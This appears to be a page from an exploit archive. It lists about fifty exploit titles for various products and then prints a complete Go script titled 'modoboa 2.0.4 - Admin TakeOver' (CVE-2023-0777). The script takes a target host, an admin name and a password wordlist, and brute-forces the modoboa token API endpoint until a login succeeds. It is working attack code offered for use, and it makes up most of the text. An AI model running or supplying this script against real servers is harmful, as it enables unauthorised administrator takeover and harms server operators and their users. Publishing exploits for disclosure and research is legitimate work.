
50 changes to exploits/shellcodes/ghdb Mitel MiCollab AWV 8.1.2.4 and 9.1.3 - Directory Traversal and LFI ABUS Security Camera TVIP 20000-21150 - LFI_ RCE and SSH Root Access Arris Router Firmware 9.1.103 - Remote Code Execution (RCE) (Authenticated) Osprey Pump Controller 1.0.1 - (eventFileSelected) Command Injection Osprey Pump Controller 1.0.1 - (pseudonym) Semi-blind Command Injection Osprey Pump Controller 1.0.1 - (userName) Blind Command Injection Osprey Pump Controller 1.0.1 - Administrator Backdoor Access Osprey Pump Controller 1.0.1 - Authentication Bypass Credentials Modification Osprey Pump Controller 1.0.1 - Cross-Site Request Forgery Osprey Pump Controller 1.0.1 - Predictable Session Token / Session Hijack Osprey Pump Controller 1.0.1 - Unauthenticated File Disclosure Osprey Pump Controller 1.0.1 - Unauthenticated Remote Code Execution Exploit Osprey Pump Controller v1.0.1 - Unauthenticated Reflected XSS WIMAX SWC-5100W Firmware V(1.11.0.1 :1.9.9.4) - Authenticated RCE HospitalRun 1.0.0-beta - Local Root Exploit for macOS Adobe Connect 10 - Username Disclosure craftercms 4.x.x - CORS EasyNas 1.1.0 - OS Command Injection Agilebio Lab Collector Electronic Lab Notebook v4.234 - Remote Code Execution (RCE) Art Gallery Management System Project in PHP v 1.0 - SQL injection atrocore 1.5.25 User interaction - Unauthenticated File upload - RCE Auto Dealer Management System 1.0 - Broken Access Control Exploit Auto Dealer Management System v1.0 - SQL Injection Auto Dealer Management System v1.0 - SQL Injection in sell_vehicle.php Auto Dealer Management System v1.0 - SQL Injection on manage_user.php Best pos Management System v1.0 - Remote Code Execution (RCE) on File Upload Best pos Management System v1.0 - SQL Injection ChurchCRM v4.5.3-121fcc1 - SQL Injection Dompdf 1.2.1 - Remote Code Execution (RCE) Employee Task Management System v1.0 - Broken Authentication Employee Task Management System v1.0 - SQL Injection on (task-details.php?task_id=?) Employee Task Management System v1.0 - SQL Injection on edit-task.php flatnux 2021-03.25 - Remote Code Execution (Authenticated) Intern Record System v1.0 - SQL Injection (Unauthenticated) Kimai-1.30.10 - SameSite Cookie-Vulnerability session hijacking LDAP Tool Box Self Service Password v1.5.2 - Account takeover Music Gallery Site v1.0 - Broken Access Control Music Gallery Site v1.0 - SQL Injection on music_list.php Music Gallery Site v1.0 - SQL Injection on page Master.php Music Gallery Site v1.0 - SQL Injection on page view_music_details.php POLR URL 2.3.0 - Shortener Admin Takeover Purchase Order Management-1.0 - Local File Inclusion Simple Food Ordering System v1.0 - Cross-Site Scripting (XSS) Simple Task Managing System v1.0 - SQL Injection (Unauthenticated) modoboa 2.0.4 - Admin TakeOver pdfkit v0.8.7.2 - Command Injection FileZilla Client 3.63.1 - 'TextShaping.dl' DLL Hijacking Windows 11 10.0.22000 - Backup service Privilege Escalation TitanFTP 2.0.1.2102 - Path traversal to Remote Code Execution (RCE) Unified Remote 3.13.0 - Remote Code Execution (RCE)
100 lines
No EOL
2.8 KiB
Go
Executable file
100 lines
No EOL
2.8 KiB
Go
Executable file
/* # Exploit Title: modoboa 2.0.4 - Admin TakeOver
|
|
# Description: Authentication Bypass by Primary Weakness
|
|
# Date: 02/10/2023
|
|
# Software Link: https://github.com/modoboa/modoboa
|
|
# Version: modoboa/modoboa prior to 2.0.4
|
|
# Tested on: Arch Linux
|
|
# Exploit Author: 7h3h4ckv157
|
|
# CVE: CVE-2023-0777
|
|
|
|
|
|
*/
|
|
|
|
package main
|
|
|
|
import (
|
|
"fmt"
|
|
"io/ioutil"
|
|
"net/http"
|
|
"os"
|
|
"strings"
|
|
"time"
|
|
)
|
|
|
|
func main() {
|
|
fmt.Println("\n\t*** ADMIN TAKEOVER ***\n")
|
|
host := getInput("Enter the target host: ")
|
|
username := getInput("Enter the Admin's Name: ")
|
|
passwordFile := getInput("Provide the path for Password-Wordlist: ")
|
|
|
|
|
|
passwords, err := readLines(passwordFile)
|
|
if err != nil {
|
|
fmt.Println("Error reading password file:", err)
|
|
os.Exit(1)
|
|
}
|
|
|
|
for _, password := range passwords {
|
|
data := fmt.Sprintf("-----------------------------25524418606542250161357131552\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n%s\r\n-----------------------------25524418606542250161357131552\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n%s\r\n-----------------------------25524418606542250161357131552--\r\n\r\n", username, password)
|
|
|
|
headers := map[string]string{
|
|
"Host": host,
|
|
"User-Agent": "Anonymous",
|
|
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
|
|
"Accept-Language": "en-US,en;q=0.5",
|
|
"Accept-Encoding": "gzip, deflate",
|
|
"Content-Type": "multipart/form-data; boundary=---------------------------25524418606542250161357131552",
|
|
}
|
|
|
|
resp, err := postRequest(fmt.Sprintf("https://%s/api/v2/token/", host), headers, data)
|
|
if err != nil {
|
|
fmt.Println("Error sending request:", err)
|
|
os.Exit(1)
|
|
}
|
|
|
|
if resp.StatusCode == 200 {
|
|
fmt.Printf("\n\tValid password Found: %s\n", password)
|
|
break
|
|
} else {
|
|
fmt.Printf("Invalid password: %s\n", password)
|
|
}
|
|
|
|
// Delay the next request to limit the requests per second
|
|
delay := time.Duration(1000000000/50) * time.Nanosecond
|
|
time.Sleep(delay)
|
|
}
|
|
}
|
|
|
|
// Read the lines from a file and return them as a slice of strings
|
|
func readLines(filename string) ([]string, error) {
|
|
content, err := ioutil.ReadFile(filename)
|
|
if err != nil {
|
|
return nil, err
|
|
}
|
|
return strings.Split(string(content), "\n"), nil
|
|
}
|
|
|
|
// Send a POST request with the given headers and data
|
|
func postRequest(url string, headers map[string]string, data string) (*http.Response, error) {
|
|
req, err := http.NewRequest("POST", url, strings.NewReader(data))
|
|
if err != nil {
|
|
return nil, err
|
|
}
|
|
for key, value := range headers {
|
|
req.Header.Set(key, value)
|
|
}
|
|
client := &http.Client{}
|
|
resp, err := client.Do(req)
|
|
if err != nil {
|
|
return nil, err
|
|
}
|
|
return resp, nil
|
|
}
|
|
|
|
// Get user input and return the trimmed value
|
|
func getInput(prompt string) string {
|
|
fmt.Print(prompt)
|
|
var input string
|
|
fmt.Scanln(&input)
|
|
return strings.TrimSpace(input)
|
|
} |